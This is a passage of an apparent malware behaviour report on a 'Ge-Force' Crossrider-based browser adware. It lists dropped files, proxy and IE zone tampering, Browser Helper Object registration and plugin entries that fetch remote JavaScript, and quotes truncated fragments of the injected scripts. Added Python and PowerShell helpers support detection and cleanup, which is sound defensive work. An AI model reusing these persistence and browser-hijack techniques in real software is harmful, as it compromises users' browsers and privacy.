%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB4.tmp (0 bytes)
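The file lists above for Khtmovq.exe:664 and %original file name%.exe:1616 mix the NSIS installer's temporary staging files (under %Temp%\ns*.tmp, deleted again at the end of the run) with the files that actually persist: the %Program Files%\Ge-Force directory, the two .job files under %WinDir%\Tasks, system.ini and jusched.exe. The following Python helper is an added example, not part of the Lavasoft report: it parses lines in the report's `<path> (N bytes)` form, subtracts the "deletes" list from the "creates and/or writes" list, and tags the survivors by location, which is the list a responder would hunt for on other hosts. The input is a constructed excerpt of the lines above; the tag names and the location rules (written for the paths in this report) are mine.

```python
import re
from collections import defaultdict, namedtuple

Entry = namedtuple("Entry", "path size")

# One report line: `<path> (<size> bytes)`
_LINE = re.compile(r"^(?P<path>.+?) \((?P<size>\d+) bytes\)$")

# Location tags; the first matching rule wins.  Patterns are written
# against the %placeholder% form the report uses, not expanded paths.
_RULES = [
    ("scheduled-task", re.compile(r"^%WinDir%\\Tasks\\[^\\]+\.job$", re.I)),
    ("system-config",  re.compile(r"^%WinDir%\\system\.ini$", re.I)),
    ("install-dir",    re.compile(r"^%Program Files%\\Ge-Force\\", re.I)),
    ("java-dir",       re.compile(r"^%Program Files%\\Common Files\\Java\\", re.I)),
    ("nsis-staging",   re.compile(r"\\Local Settings\\Temp\\ns[a-z0-9]+\.tmp(\\|$)", re.I)),
    ("ie-cache",       re.compile(r"\\Temporary Internet Files\\Content\.IE5\\", re.I)),
    ("temp",           re.compile(r"\\Local Settings\\Temp\\", re.I)),
]


def parse_entries(text):
    """Parse report lines into Entry(path, size); blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _LINE.match(line)
        if not m:
            raise ValueError("unexpected line: %r" % line)
        entries.append(Entry(m.group("path"), int(m.group("size"))))
    return entries


def tag(path):
    """Location tag for one path, or 'other'."""
    for name, rx in _RULES:
        if rx.search(path):
            return name
    return "other"


def surviving(created, deleted):
    """Entries written but never deleted (case-insensitive path match)."""
    gone = {e.path.lower() for e in deleted}
    return [e for e in created if e.path.lower() not in gone]


def triage(created_text, deleted_text):
    """Map tag -> sorted list of paths that remain on disk after the run."""
    created = parse_entries(created_text)
    deleted = parse_entries(deleted_text)
    out = defaultdict(list)
    for e in surviving(created, deleted):
        out[tag(e.path)].append(e.path)
    return {k: sorted(v) for k, v in out.items()}


# Constructed excerpt of the report's lists (a handful of the lines above).
CREATED = r"""
%Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
%Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
%WinDir%\system.ini (72 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)
"""

DELETED = r"""
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (0 bytes)
"""

if __name__ == "__main__":
    for name, paths in sorted(triage(CREATED, DELETED).items()):
        print(name)
        for p in paths:
            print("   ", p)
```

Paste the full "creates and/or writes" and "deletes" lists for a process into CREATED and DELETED to get the complete survivor list; the nsis-staging tag marks the %Temp%\ns*.tmp files worth pulling from the sandbox before the installer removes them, since they are the unpacked components (the NSIS plug-in DLLs and the dropped Khtmovq.exe) rather than the packed outer file.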
Registry activity
The process Ge-Force-codedownloader.exe:2504 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 3B B8 98 C0 3E 1C 13 AA 25 7E 13 60 E7 DA C3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm sets the IE Local intranet zone option "Include all network paths (UNCs)", so every UNC path is treated as an intranet site:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
It also sets "Include all sites that bypass the proxy server", so hosts on the proxy bypass list are treated as intranet sites:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
It also sets "Include all local (intranet) sites not listed in other zones", so plain host names without dots fall into the Intranet Zone (this value does not map all URLs to that zone):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Each of the three ZoneMap values corresponds to one check box under Internet Options > Security > Local intranet > Sites; 1 means the box is ticked. WinINet also writes these values itself when a fresh profile's ZoneMap key is first populated, so on their own they are a weak indicator.
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Ge-Force-codedownloader.exe:2564 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 8A EA 02 46 B1 54 1E 18 F1 0E CA 5C 93 93 E3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm sets the IE Local intranet zone option "Include all network paths (UNCs)", so every UNC path is treated as an intranet site:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
It also sets "Include all sites that bypass the proxy server", so hosts on the proxy bypass list are treated as intranet sites:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
It also sets "Include all local (intranet) sites not listed in other zones", so plain host names without dots fall into the Intranet Zone (this value does not map all URLs to that zone):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Each of the three ZoneMap values corresponds to one check box under Internet Options > Security > Local intranet > Sites; 1 means the box is ticked. WinINet also writes these values itself when a fresh profile's ZoneMap key is first populated, so on their own they are a weak indicator.
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
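The following PowerShell audit is an added example and is not part of the Lavasoft report. It reads the four values the sample changes under HKCU, reports which ones are in the weakened state, checks for the three deleted proxy values, and optionally removes the ZoneMap overrides. The `-Fix` switch and the helper name `Get-RegValueOrNull` are this example's own; the registry paths and value names are the ones listed above.

```powershell
# Added example (not from the Lavasoft report): audit the IE zone-map and proxy
# values this sample sets or deletes under HKCU, report which are in the
# weakened state, and optionally remove the zone-map overrides.
param([switch]$Fix)

$zoneMap = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap'
$inetSet = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'

function Get-RegValueOrNull([string]$Key, [string]$Name) {
    # Get-ItemProperty with -Name throws when the key or the value is missing;
    # treat both as "not set" rather than as an error.
    try {
        return (Get-ItemProperty -Path $Key -Name $Name -ErrorAction Stop).$Name
    } catch {
        return $null
    }
}

# Each entry: registry value, the value the sample writes, and the checkbox
# that value corresponds to in IE's Local intranet zone dialog.
$checks = @(
    @{ Key = $zoneMap; Name = 'IntranetName';  Bad = 1; Meaning = 'Include all local (intranet) sites not listed in other zones' }
    @{ Key = $zoneMap; Name = 'UNCAsIntranet'; Bad = 1; Meaning = 'Include all network paths (UNCs)' }
    @{ Key = $zoneMap; Name = 'ProxyBypass';   Bad = 1; Meaning = 'Include all sites that bypass the proxy server' }
    @{ Key = $inetSet; Name = 'ProxyEnable';   Bad = 0; Meaning = 'Use a proxy server (the sample turns it off)' }
)

$findings = foreach ($c in $checks) {
    $current = Get-RegValueOrNull -Key $c.Key -Name $c.Name
    [pscustomobject]@{
        Value    = $c.Name
        Current  = $current
        Weakened = ($null -ne $current) -and ([int]$current -eq $c.Bad)
        Meaning  = $c.Meaning
    }
}
$findings | Format-Table -AutoSize

# The sample deletes these three values; on a host that is supposed to use a
# proxy or a PAC file, their absence is itself an indicator.
foreach ($name in 'AutoConfigURL', 'ProxyServer', 'ProxyOverride') {
    if ($null -eq (Get-RegValueOrNull -Key $inetSet -Name $name)) {
        Write-Output "$name is not set under $inetSet"
    }
}

# Remediation: removing the overrides returns the three zone-map flags to the
# behaviour IE applies when the values are absent. Proxy settings have to be
# restored from this host's known-good configuration, which the report cannot
# supply.
if ($Fix) {
    foreach ($name in 'IntranetName', 'UNCAsIntranet', 'ProxyBypass') {
        Remove-ItemProperty -Path $zoneMap -Name $name -ErrorAction SilentlyContinue
    }
}
```

Run it as the affected user, since every value involved lives under HKCU; the hardware-profile copy of ProxyEnable under HKLM that the report also shows is not covered here.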
The process regsvr32.exe:2416 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Ge-Force"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}]
"(Default)" = "ISandBox"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
"(Default)" = "Ge-Force"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129 Type Library"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"Version" = "1.0"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\0\win32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 CF F8 5D EB 30 6B 3C 3D 18 05 8A 10 0B BE F6"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}]
"(Default)" = "ICrossriderBHO"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
"(Default)" = ""
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"
It registers itself as a Browser Helper Object (BHO) so that Internet Explorer loads it at every start. The CLSID below resolves, through the InprocServer32 entries above, to %Program Files%\Ge-Force\Ge-Force-bho.dll; the interface name "ICrossriderBHO" and the HKCU\Software\Crossrider key written later in this report identify the component as an extension built on the Crossrider framework. "NoExplorer" = "1" stops the BHO from also being loaded into Windows Explorer. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
"NoExplorer" = "1"
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
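The following PowerShell script is an added example and is not part of the Lavasoft report. It enumerates IE Browser Helper Objects, resolves each CLSID to the DLL IE would load and checks its Authenticode status, and then lists the Protected Mode ElevationPolicy entries that the Khtmovq.exe process writes later in this report. The vendor folder name is an assumption exposed as the `-Vendor` parameter; the Wow6432Node paths only matter on 64-bit hosts (the sample was analysed on 32-bit XP).

```powershell
# Added example (not from the Lavasoft report): list IE Browser Helper Objects
# and Protected Mode elevation policies, resolve each BHO CLSID to the DLL it
# loads, and flag entries matching the artifacts in this report. The vendor
# folder name is an assumption exposed as a parameter.
param([string]$Vendor = 'Ge-Force')

function Get-DefaultValue([string]$Path) {
    if (-not (Test-Path $Path)) { return $null }
    return (Get-ItemProperty -Path $Path).'(default)'
}

function Resolve-ClsidServer([string]$Clsid) {
    # InprocServer32's default value is the DLL IE will load for this CLSID.
    # HKCU\Software\Classes wins over HKLM for the current user, so check it
    # first; the Wow6432Node hive covers 32-bit BHOs on 64-bit Windows.
    $hives = 'HKCU:\Software\Classes\CLSID',
             'HKLM:\SOFTWARE\Classes\CLSID',
             'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID'
    foreach ($hive in $hives) {
        $dll = Get-DefaultValue (Join-Path $hive "$Clsid\InprocServer32")
        if ($dll) { return [Environment]::ExpandEnvironmentVariables($dll) }
    }
    return $null
}

function Get-BhoReport([string]$Flag) {
    $roots = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects',
             'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects'
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($key in Get-ChildItem -Path $root) {
            $clsid = $key.PSChildName
            $dll   = Resolve-ClsidServer $clsid
            $sig   = if ($dll -and (Test-Path $dll)) {
                         (Get-AuthenticodeSignature -FilePath $dll).Status
                     } else { 'FileMissing' }
            [pscustomobject]@{
                CLSID      = $clsid
                Name       = Get-DefaultValue $key.PSPath
                NoExplorer = (Get-ItemProperty -Path $key.PSPath).NoExplorer
                Dll        = $dll
                Signature  = $sig
                # Unsigned DLL, missing file, or DLL under the vendor folder: worth a look.
                Suspicious = ($dll -like "*\$Flag\*") -or ("$sig" -ne 'Valid')
            }
        }
    }
}

function Get-ElevationPolicyReport([string]$Flag) {
    # Policy values (IE Protected Mode): 0 = block launch, 1 = silently launch
    # at low integrity, 2 = prompt the user, 3 = silently launch at medium
    # integrity. This report shows Policy 1 for Ge-Force-bg.exe and Policy 3
    # for a third GUID whose AppPath is the same vendor folder.
    $roots = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy',
             'HKCU:\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy'
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($key in Get-ChildItem -Path $root) {
            $p = Get-ItemProperty -Path $key.PSPath
            [pscustomobject]@{
                Hive       = $root.Split(':')[0]
                Guid       = $key.PSChildName
                AppName    = $p.AppName
                AppPath    = $p.AppPath
                Policy     = $p.Policy
                Suspicious = ($p.Policy -eq 3) -or ($p.AppPath -like "*\$Flag*")
            }
        }
    }
}

Get-BhoReport -Flag $Vendor | Format-Table -AutoSize
Get-ElevationPolicyReport -Flag $Vendor | Where-Object { $_.Suspicious } | Format-Table -AutoSize
```

A Policy of 3 lets Protected Mode IE start the named executable at medium integrity without a prompt, so any ElevationPolicy entry pointing at a path outside the Windows or Program Files directories of a trusted product deserves the same scrutiny as the BHO itself.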
The Worm deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]
The process Khtmovq.exe:664 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Ge-Force\Plugins\192]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/192.js"
[HKCU\Software\InstalledBrowserExtensions\21836]
"69129" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\17]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/17.js"
[HKCU\Software\Ge-Force\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('…', 'fuetdjnmfc'); }"
[HKCU\Software\Ge-Force\Plugins\22]
"Name" = "resources"
[HKCU\Software\Ge-Force\Plugins\39]
"Version" = "5"
[HKCU\Software\Ge-Force\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\Ge-Force\Plugins\301]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\262]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/262.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Ge-Force\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\Ge-Force\Manifest]
"PublisherId" = "21836"
[HKCU\Software\Ge-Force\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\Ge-Force\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKCU\Software\Ge-Force\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\Ge-Force\Plugins\242]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\Ge-Force\Plugins\72]
"Version" = "5"
[HKCU\Software\Ge-Force\Plugins\44]
